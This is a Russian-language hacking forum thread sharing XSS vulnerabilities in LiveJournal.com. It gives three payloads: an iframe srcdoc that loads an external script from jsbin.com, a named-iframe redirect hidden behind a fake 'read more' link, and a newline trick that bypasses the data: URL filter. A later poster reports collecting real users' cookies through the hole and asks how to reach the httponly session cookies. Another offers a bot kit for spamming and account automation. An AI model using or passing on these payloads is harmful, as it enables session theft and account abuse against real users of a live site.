XSS уязвимости в LiveJournal.com

[malayazemlya]

Не знаю, насколько полезно, но пусть будет.

Несколько багов, позволяющих размещать в постах и коментах в livejournal.com недозволенную всячину.

Во-первых, не фильтруется атрибут srcdoc в теге iframe

<iframe width="10"
height="10"
src="http://www.youtube.com/embed/8EMZoCChpqY?rel=0&amp;wmode=opaque" frameborder="0" allowfullscreen="allowfullscreen"
srcdoc="&lt;script src=http://jsbin.com/uhabov/1/&gt;&lt;/script&gt;">

Во-вторых, если iframe дать атрибут name, то можно перенаправить этот iframe на неразрешенный url (Обычно ЖЖ позволяет айфреймить только сайты из "белого списка", вроде Youtube итп) Для этого надо как-то заставить пользователя кликнуть на линк - например, нарисовав поддельный "кат"

<iframe name="ifr" width="560" height="315" src="http://www.youtube.com/embed/KhrteSZXFzM?rel=0" frameborder="0" allowfullscreen></iframe>

<a target="ifr" href="http://jsbin.com/ugoduw/2/">Read more...</a>)

В-третьих, можно обойти фильтрацию URL-ов с протоколом data, добавив в начало символ новой строки:

(<a href="
data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;">Read more...</a>)

 

[Quake3]

Подниму тему. Хсс еще рабочая, но. Мне приходят куки, хотя на самом деле их больше (браузер серверу передает).

В частности хсс не ловит ljloggedin и ljsession , которые, как я понимаю, ключевые.
Посмотрел подробней - у этих кук стоит флаг "httponly". Как я понимаю, в таком случае их никак не достать? (малварь на компе у юзера не в счет)

 

[tsss]

мне писали комплекс под livejournal.com: регать, постить, френдить и т.д., короче с полным функционалом работать

если интересно, можем совместно что то замутить, вашу тему воткнём в мой комплекс, комплекс предоставлю, в привате, писали толи за 400 толи за 600, точно не помню (неплохой)

мне крайне интересно всё, что связано с livejournal.com, думаю что при желании сможем найти точки соприкосновения